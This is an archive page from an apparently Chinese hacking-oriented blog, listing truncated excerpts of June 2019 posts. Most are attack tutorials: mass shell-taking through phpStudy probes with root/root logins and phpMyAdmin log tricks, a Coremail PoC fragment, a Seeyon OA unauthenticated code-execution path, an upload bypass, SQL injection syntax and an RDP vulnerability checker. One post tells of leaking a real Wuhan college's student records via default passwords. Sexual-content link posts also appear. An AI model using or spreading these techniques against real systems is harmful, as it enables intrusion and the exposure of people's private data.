201906 - Kirin博客-Kirin博客全网最大的免费网络资源分享平台

七彩网络

毒蜂网络独家模板

日志归档

2019年6月发布的文章

技术教程

利用PHPstudy探针弱口令漏洞批量拿shell

关键字:phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令:root 成功,如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径,我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和......

阅读(291)评论(0)

技术教程

关于coremail的0day附带poc

import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/” r = requests.get(url) if (r.status_code != ‘404’) and (“/home/cor......

阅读(117)评论(1)

技术教程

武汉某大学-学生信息泄露

也是无聊的时候无意间逛见的,进入主题。 看到可能会想怎么进去,我就去百度搜了一下教务管理系统用户名和密码是多少 百度告诉我的答案普遍是账号是学号密码也是学号或者密码是123456, 接下来知道了那么我们该怎么去获取学号呢。 1.百度武汉xxxx职业技术学院学号 如图 接下来去试试此学号有无有用。 上面百度收集到的信息说是密码可能是学号也可能是1......

阅读(154)评论(1)

值得一看

微博肉感评选/柔软36C胸部

一个是“梁茶叔”带头举办的年度肉感评选,不只有瘦人身材才好,稍微胖一点前凸后翘体验更佳。 这些女人又给看胸又给看屁股的,知道你们很胖了还不行么。 另一个是“热带汽水”的网友,感到很沮丧,想要触摸一些36C柔软的东西,好心的网友给他准备了不少照片。 地址1:http://uee.me/aW4mq ......

阅读(192)评论(4)

值得一看

暗网流出的诡异图片!千万别被骗了...

暗网对于一般人来说比较神秘,因为它无法通过正常渠道进入,所以有些人会利用这一特点在网上编造图文故事,比如下面这三张被誉为从暗网流出的图片...... 长颈黑色不明生物 传闻:只要进过暗网的朋友一定看过这张照片,据说,有人在拍摄这个黑人男子时,他的背后突然出现了一个黑色长颈不明生物。 有人说这是一个长颈的外星人,也有人认为是召唤出......

阅读(201)评论(0)

技术教程

致远OA系统远程命令代码执行漏洞

1.致远OA A8无需认证代码执行漏洞 网站地址:http://127.0.0.1:8088/seeyon/index.jsp 因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓ 2. 接下来用:/seeyon/htmlofficeservlet 来访问。http://127.0.0.1:8088/seeyon/htmloffi......

阅读(507)评论(0)

技术教程

一次实战拿shell上传绕过

一、物理路径 在url后面随便输入个字符,得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议,如果被非正常手段登录,将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口,如果被非正常手段登录,将会面临数据库......

阅读(225)评论(0)

技术教程

C语言-扬帆起航

用C语言在控制台输出 一些字符图案!!! 编译器:VS2019版本 代码如下 #include<stdio.h> #include<windows.h> int color(int c) { SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HAN......

阅读(91)评论(0)

技术教程

SQL注入语法

1.判断有无注入点: http://127.0.0.1/index.asp?id=1 and 1=1 http://127.0.0.1/index.asp?id=1 and 1=2 http://127.0.0.1/index.asp?id=1′ 2.猜字段数: http://127.0.0.1/index.asp?id=1 order b......

阅读(112)评论(0)

值得一看

中国拟立密码法明确任何组织或个人不得窃取他人加密信息

8密码法草案25日提请十三届全国人大常委会初次审议。草案明确,任何组织或者个人不得窃取他人的加密信息,不得非法侵入他人的密码保障系统,不得利用密码从事危害国家安全、社会公共利益、他人合法权益的活动或者其他违法犯罪活动。 你的密码安全吗?毒蜂教你密码设置,速收学习!123456、888888、5201314……这些数字你熟悉吗?如何设置一个安全性足够高的密码......

阅读(86)评论(0)

技术教程

CVE-2019-0708漏洞检测工具

CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。   GitHub项目:http......

阅读(358)评论(0)